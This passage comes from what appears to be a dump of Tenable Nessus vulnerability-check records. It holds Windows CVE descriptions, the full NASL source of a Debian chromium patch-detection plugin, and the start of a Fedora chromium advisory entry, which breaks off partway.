(CVE-2020-0937, CVE-2020-0939, CVE-2020-0945, CVE-2020-0946, CVE-2020-0947)\n\n - A remote code execution vulnerability exists when Windows Hyper-V on a host server fails to properly validate input from an authenticated user on a guest operating system. (CVE-2020-0910)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1027)\n\n - A security feature bypass vulnerability exists when Windows fails to properly handle token relationships. An attacker who successfully exploited the vulnerability could allow an application with a certain integrity level to execute code at a different integrity level, leading to a sandbox escape. The update addresses the vulnerability by correcting how Windows handles token relationships (CVE-2020-0981)\n\n - An elevation of privilege vulnerability exists when the Windows Work Folder Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Work Folder Service handles file operations. (CVE-2020-1094)\n\n - An information disclosure vulnerability exists when certain central processing units (CPU) speculatively access memory. An attacker who successfully exploited the vulnerability could read privileged data across trust boundaries. (CVE-2020-0955)\n\n - An elevation of privilege vulnerability exists when Connected User Experiences and Telemetry Service improperly handles file operations. An attacker who successfully exploited this vulnerability could overwrite files in arbitrary locations with elevated permissions. 
(CVE-2020-0942)\n\n - A remote code execution vulnerability exists when the Windows font library improperly handles specially crafted embedded fonts. An attacker who successfully exploited the vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0687)\n\n - An elevation of privilege vulnerability exists in the Microsoft Windows Update Client when it does not properly handle privileges. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could then install programs; view, change or delete data. (CVE-2020-1014)\n\n - A denial of service vulnerability exists when Windows improperly handles objects in memory. An attacker who successfully exploited the vulnerability could cause a target system to stop responding. (CVE-2020-0794)\n\n - A remote code execution vulnerability exists in the way that Microsoft Graphics Components handle objects in memory. An attacker who successfully exploited the vulnerability could execute arbitrary code on a target system. (CVE-2020-0907)\n\n - An elevation of privilege vulnerability exists when the Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-1004)\n\n - An elevation of privilege vulnerability exists in the way that the User-Mode Power Service (UMPS) handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1015)\n\n - An elevation of privilege vulnerability exists when the Windows Delivery Optimization service improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code with elevated system privileges. 
An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0983)\n\n - An elevation of privilege vulnerability exists in the way the Windows Push Notification Service handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could then install programs; view, change or delete data. (CVE-2020-0940, CVE-2020-1001, CVE-2020-1006, CVE-2020-1017)\n\n - An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0956, CVE-2020-0958)\n\n - An information disclosure vulnerability exists when the Microsoft Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-0982, CVE-2020-0987, CVE-2020-1005)\n\n - An information disclosure vulnerability exists when the Windows Push Notification Service improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. An authenticated attacker could exploit this vulnerability by running a specially crafted application. The update addresses the vulnerability by correcting how the Windows Push Notification Service handles objects in memory.\n (CVE-2020-1016)\n\n - A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. 
An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-0895, CVE-2020-0966, CVE-2020-0967)\n\n - An elevation of privilege vulnerability exists when Windows Hyper-V on a host server fails to properly handle objects in memory. An attacker who successfully exploited these vulnerabilities could gain elevated privileges on a target operating system. This vulnerability by itself does not allow arbitrary code to be run. However, this vulnerability could be used in conjunction with one or more vulnerabilities (e.g. a remote code execution vulnerability and another elevation of privilege) that could take advantage of the elevated privileges when running. The update addresses the vulnerabilities by correcting how Windows Hyper-V handles objects in memory. (CVE-2020-0917, CVE-2020-0918)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory. (CVE-2020-0952)\n\n - An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0913, CVE-2020-1000, CVE-2020-1003)\n\n - An elevation of privilege vulnerability exists when DirectX improperly handles objects in memory. 
An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0784, CVE-2020-0888)\n\n - A remote code execution vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in the memory. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0964)\n\n - A denial of service vulnerability exists in Windows DNS when it fails to properly handle queries. An attacker who successfully exploited this vulnerability could cause the DNS service to become nonresponsive.\n (CVE-2020-0993)\n\n - An elevation of privilege vulnerability exists when the Windows System Assessment Tool improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows System Assessment Tool handles file operations. (CVE-2020-1011)\n\n - A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. 
"obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19880", "CVE-2019-19923", "CVE-2019-19925", "CVE-2019-19926", "CVE-2020-6381", "CVE-2020-6382", "CVE-2020-6383", "CVE-2020-6384", "CVE-2020-6385", "CVE-2020-6386", "CVE-2020-6387", "CVE-2020-6388", "CVE-2020-6389", "CVE-2020-6390", "CVE-2020-6391", "CVE-2020-6392", "CVE-2020-6393", "CVE-2020-6394", "CVE-2020-6395", "CVE-2020-6396", "CVE-2020-6397", "CVE-2020-6398", "CVE-2020-6399", "CVE-2020-6400", "CVE-2020-6401", "CVE-2020-6402", "CVE-2020-6403", "CVE-2020-6404", "CVE-2020-6405", "CVE-2020-6406", "CVE-2020-6407", "CVE-2020-6408", "CVE-2020-6409", "CVE-2020-6410", "CVE-2020-6411", "CVE-2020-6412", "CVE-2020-6413", "CVE-2020-6414", "CVE-2020-6415", "CVE-2020-6416", "CVE-2020-6418", "CVE-2020-6420"], "modified": "2022-12-07T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:chromium", "cpe:/o:debian:debian_linux:10.0"], "id": "DEBIAN_DSA-4638.NASL", "href": "https://www.tenable.com/plugins/nessus/134433", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4638. 
The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(134433);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/07\");\n\n script_cve_id(\"CVE-2019-19880\", \"CVE-2019-19923\", \"CVE-2019-19925\", \"CVE-2019-19926\", \"CVE-2020-6381\", \"CVE-2020-6382\", \"CVE-2020-6383\", \"CVE-2020-6384\", \"CVE-2020-6385\", \"CVE-2020-6386\", \"CVE-2020-6387\", \"CVE-2020-6388\", \"CVE-2020-6389\", \"CVE-2020-6390\", \"CVE-2020-6391\", \"CVE-2020-6392\", \"CVE-2020-6393\", \"CVE-2020-6394\", \"CVE-2020-6395\", \"CVE-2020-6396\", \"CVE-2020-6397\", \"CVE-2020-6398\", \"CVE-2020-6399\", \"CVE-2020-6400\", \"CVE-2020-6401\", \"CVE-2020-6402\", \"CVE-2020-6403\", \"CVE-2020-6404\", \"CVE-2020-6405\", \"CVE-2020-6406\", \"CVE-2020-6407\", \"CVE-2020-6408\", \"CVE-2020-6409\", \"CVE-2020-6410\", \"CVE-2020-6411\", \"CVE-2020-6412\", \"CVE-2020-6413\", \"CVE-2020-6414\", \"CVE-2020-6415\", \"CVE-2020-6416\", \"CVE-2020-6418\", \"CVE-2020-6420\");\n script_xref(name:\"DSA\", value:\"4638\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0023\");\n\n script_name(english:\"Debian DSA-4638-1 : chromium - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Several vulnerabilities have been discovered in the chromium web\nbrowser.\n\n - CVE-2019-19880\n Richard Lorenz discovered an issue in the sqlite\n library.\n\n - CVE-2019-19923\n Richard Lorenz discovered an out-of-bounds read issue in\n the sqlite library.\n\n - CVE-2019-19925\n Richard Lorenz discovered an issue in the sqlite\n library.\n\n - 
CVE-2019-19926\n Richard Lorenz discovered an implementation error in the\n sqlite library.\n\n - CVE-2020-6381\n UK's National Cyber Security Centre discovered an\n integer overflow issue in the v8 JavaScript library.\n\n - CVE-2020-6382\n Soyeon Park and Wen Xu discovered a type error in the v8\n JavaScript library.\n\n - CVE-2020-6383\n Sergei Glazunov discovered a type error in the v8\n JavaScript library.\n\n - CVE-2020-6384\n David Manoucheri discovered a use-after-free issue in\n WebAudio.\n\n - CVE-2020-6385\n Sergei Glazunov discovered a policy enforcement error.\n\n - CVE-2020-6386\n Zhe Jin discovered a use-after-free issue in speech\n processing.\n\n - CVE-2020-6387\n Natalie Silvanovich discovered an out-of-bounds write\n error in the WebRTC implementation.\n\n - CVE-2020-6388\n Sergei Glazunov discovered an out-of-bounds read error\n in the WebRTC implementation.\n\n - CVE-2020-6389\n Natalie Silvanovich discovered an out-of-bounds write\n error in the WebRTC implementation.\n\n - CVE-2020-6390\n Sergei Glazunov discovered an out-of-bounds read error.\n\n - CVE-2020-6391\n Michal Bentkowski discoverd that untrusted input was\n insufficiently validated.\n\n - CVE-2020-6392\n The Microsoft Edge Team discovered a policy enforcement\n error.\n\n - CVE-2020-6393\n Mark Amery discovered a policy enforcement error.\n\n - CVE-2020-6394\n Phil Freo discovered a policy enforcement error.\n\n - CVE-2020-6395\n Pierre Langlois discovered an out-of-bounds read error\n in the v8 JavaScript library.\n\n - CVE-2020-6396\n William Luc Ritchie discovered an error in the skia\n library.\n\n - CVE-2020-6397\n Khalil Zhani discovered a user interface error.\n\n - CVE-2020-6398\n pdknsk discovered an uninitialized variable in the\n pdfium library.\n\n - CVE-2020-6399\n Luan Herrera discovered a policy enforcement error.\n\n - CVE-2020-6400\n Takashi Yoneuchi discovered an error in Cross-Origin\n Resource Sharing.\n\n - CVE-2020-6401\n Tzachy Horesh discovered that user 
input was\n insufficiently validated.\n\n - CVE-2020-6402\n Vladimir Metnew discovered a policy enforcement error.\n\n - CVE-2020-6403\n Khalil Zhani discovered a user interface error.\n\n - CVE-2020-6404\n kanchi discovered an error in Blink/Webkit.\n\n - CVE-2020-6405\n Yongheng Chen and Rui Zhong discovered an out-of-bounds\n read issue in the sqlite library.\n\n - CVE-2020-6406\n Sergei Glazunov discovered a use-after-free issue.\n\n - CVE-2020-6407\n Sergei Glazunov discovered an out-of-bounds read error.\n\n - CVE-2020-6408\n Zhong Zhaochen discovered a policy enforcement error in\n Cross-Origin Resource Sharing.\n\n - CVE-2020-6409\n Divagar S and Bharathi V discovered an error in the\n omnibox implementation.\n\n - CVE-2020-6410\n evil1m0 discovered a policy enforcement error.\n\n - CVE-2020-6411\n Khalil Zhani discovered that user input was\n insufficiently validated.\n\n - CVE-2020-6412\n Zihan Zheng discovered that user input was\n insufficiently validated.\n\n - CVE-2020-6413\n Michal Bentkowski discovered an error in Blink/Webkit.\n\n - CVE-2020-6414\n Lijo A.T discovered a policy safe browsing policy\n enforcement error.\n\n - CVE-2020-6415\n Avihay Cohen discovered an implementation error in the\n v8 JavaScript library.\n\n - CVE-2020-6416\n Woojin Oh discovered that untrusted input was\n insufficiently validated.\n\n - CVE-2020-6418\n Clement Lecigne discovered a type error in the v8\n JavaScript library.\n\n - CVE-2020-6420\n Taras Uzdenov discovered a policy enforcement error.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-19880\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-19923\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-19925\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://security-tracker.debian.org/tracker/CVE-2019-19926\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6381\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6382\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6383\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6384\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6385\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6386\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6387\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6388\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6389\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6390\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6391\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6392\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6393\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6394\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6395\"\n );\n script_set_attribute(\n 
attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6396\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6397\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6398\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6399\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6400\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6401\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6402\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6403\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6404\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6405\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6406\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6407\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6408\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6409\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6410\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6411\"\n );\n script_set_attribute(\n 
attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6412\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6413\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6414\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6415\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6416\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6418\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6420\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/chromium\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/buster/chromium\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2020/dsa-4638\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Upgrade the chromium packages.\n\nFor the oldstable distribution (stretch), security support for\nchromium has been discontinued.\n\nFor the stable distribution (buster), these problems have been fixed\nin version 80.0.3987.132-1~deb10u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-6420\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n 
script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Google Chrome 80 JSCreate side-effect type confusion exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:10.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/12/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/03/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/03/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"10.0\", prefix:\"chromium\", reference:\"80.0.3987.132-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"chromium-common\", reference:\"80.0.3987.132-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"chromium-driver\", reference:\"80.0.3987.132-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"chromium-l10n\", reference:\"80.0.3987.132-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"chromium-sandbox\", reference:\"80.0.3987.132-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"chromium-shell\", reference:\"80.0.3987.132-1~deb10u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T15:07:53", "description": "Update to 80.0.3987.149. Upstream says it fixes '13' security issues, but only lists these CVEs :\n\n - CVE-2020-6422: Use after free in WebGL\n\n - CVE-2020-6424: Use after free in media\n\n - CVE-2020-6425: Insufficient policy enforcement in extensions. 
\n\n - CVE-2020-6426: Inappropriate implementation in V8\n\n - CVE-2020-6427: Use after free in audio\n\n - CVE-2020-6428: Use after free in audio\n\n - CVE-2020-6429: Use after free in audio.\n\n - CVE-2019-20503: Out of bounds read in usersctplib.\n\n - CVE-2020-6449: Use after free in audio\n\n----\n\nUpdate to 80.0.3987.132. Lots of security fixes here. VAAPI re-enabled by default except on NVIDIA.\n\nList of CVEs fixed (since last update) :\n\n - CVE-2019-20446\n\n - CVE-2020-6381 \n\n - CVE-2020-6382 \n\n - CVE-2020-6383 \n\n - CVE-2020-6384\n\n - CVE-2020-6385 \n\n - CVE-2020-6386\n\n - CVE-2020-6387 \n\n - CVE-2020-6388\n\n - CVE-2020-6389\n\n - CVE-2020-6390 \n\n - CVE-2020-6391\n\n - CVE-2020-6392 \n\n - CVE-2020-6393\n\n - CVE-2020-6394\n\n - CVE-2020-6395\n\n - CVE-2020-6396 \n\n - CVE-2020-6397 \n\n - CVE-2020-6398\n\n - CVE-2020-6399 \n\n - CVE-2020-6400 \n\n - CVE-2020-6401 \n\n - CVE-2020-6402 \n\n - CVE-2020-6403 \n\n - CVE-2020-6404 \n\n - CVE-2020-6405 \n\n - CVE-2020-6406 \n\n - CVE-2020-6407\n\n - CVE-2020-6408 \n\n - CVE-2020-6409 \n\n - CVE-2020-6410 \n\n - CVE-2020-6411 \n\n - CVE-2020-6412 \n\n - CVE-2020-6413 \n\n - CVE-2020-6414 \n\n - CVE-2020-6415 \n\n - CVE-2020-6416 \n\n - CVE-2020-6417\n\n - CVE-2020-6418\n\n - CVE-2020-6420 \n\n----\n\nUpdate to 79.0.3945.130. 
Fixes the following security issues :\n\n - CVE-2020-6378\n\n - CVE-2020-6379\n\n - CVE-2020-6380\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-03-30T00:00:00", "type": "nessus", "title": "Fedora 30 : chromium (2020-39e0b8bd14)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-20446", "CVE-2019-20503", "CVE-2020-10531", "CVE-2020-6378", "CVE-2020-6379", "CVE-2020-6380", "CVE-2020-6381", "CVE-2020-6382", "CVE-2020-6383", "CVE-2020-6384", "CVE-2020-6385", "CVE-2020-6386", "CVE-2020-6387", "CVE-2020-6388", "CVE-2020-6389", "CVE-2020-6390", "CVE-2020-6391", "CVE-2020-6392", "CVE-2020-6393", "CVE-2020-6394", "CVE-2020-6395", "CVE-2020-6396", "CVE-2020-6397", "CVE-2020-6398", "CVE-2020-6399", "CVE-2020-6400", "CVE-2020-6401", "CVE-2020-6402", "CVE-2020-6403", "CVE-2020-6404", "CVE-2020-6405", "CVE-2020-6406", "CVE-2020-6407", 
"CVE-2020-6408", "CVE-2020-6409", "CVE-2020-6410", "CVE-2020-6411", "CVE-2020-6412", "CVE-2020-6413", "CVE-2020-6414", "CVE-2020-6415", "CVE-2020-6416", "CVE-2020-6417", "CVE-2020-6418", "CVE-2020-6420", "CVE-2020-6422", "CVE-2020-6424", "CVE-2020-6425", "CVE-2020-6426", "CVE-2020-6427", "CVE-2020-6428", "CVE-2020-6429", "CVE-2020-6449"], "modified": "2022-12-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:chromium", "cpe:/o:fedoraproject:fedora:30"], "id": "FEDORA_2020-39E0B8BD14.NASL", "href": "https://www.tenable.com/plugins/nessus/134990", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2020-39e0b8bd14.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(134990);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/06\");\n\n script_cve_id(\"CVE-2019-20446\", \"CVE-2019-20503\", \"CVE-2020-10531\", \"CVE-2020-6378\", \"CVE-2020-6379\", \"CVE-2020-6380\", \"CVE-2020-6381\", \"CVE-2020-6382\", \"CVE-2020-6383\", \"CVE-2020-6384\", \"CVE-2020-6385\", \"CVE-2020-6386\", \"CVE-2020-6387\", \"CVE-2020-6388\", \"CVE-2020-6389\", \"CVE-2020-6390\", \"CVE-2020-6391\", \"CVE-2020-6392\", \"CVE-2020-6393\", \"CVE-2020-6394\", \"CVE-2020-6395\", \"CVE-2020-6396\", \"CVE-2020-6397\", \"CVE-2020-6398\", \"CVE-2020-6399\", \"CVE-2020-6400\", \"CVE-2020-6401\", \"CVE-2020-6402\", \"CVE-2020-6403\", \"CVE-2020-6404\", \"CVE-2020-6405\", \"CVE-2020-6406\", \"CVE-2020-6407\", \"CVE-2020-6408\", \"CVE-2020-6409\", \"CVE-2020-6410\", \"CVE-2020-6411\", \"CVE-2020-6412\", \"CVE-2020-6413\", \"CVE-2020-6414\", \"CVE-2020-6415\", \"CVE-2020-6416\", \"CVE-2020-6417\", \"CVE-2020-6418\", \"CVE-2020-6420\", \"CVE-2020-6422\", \"CVE-2020-6424\", \"CVE-2020-6425\", \"CVE-2020-6426\", \"CVE-2020-6427\", \"CVE-2020-6428\", 
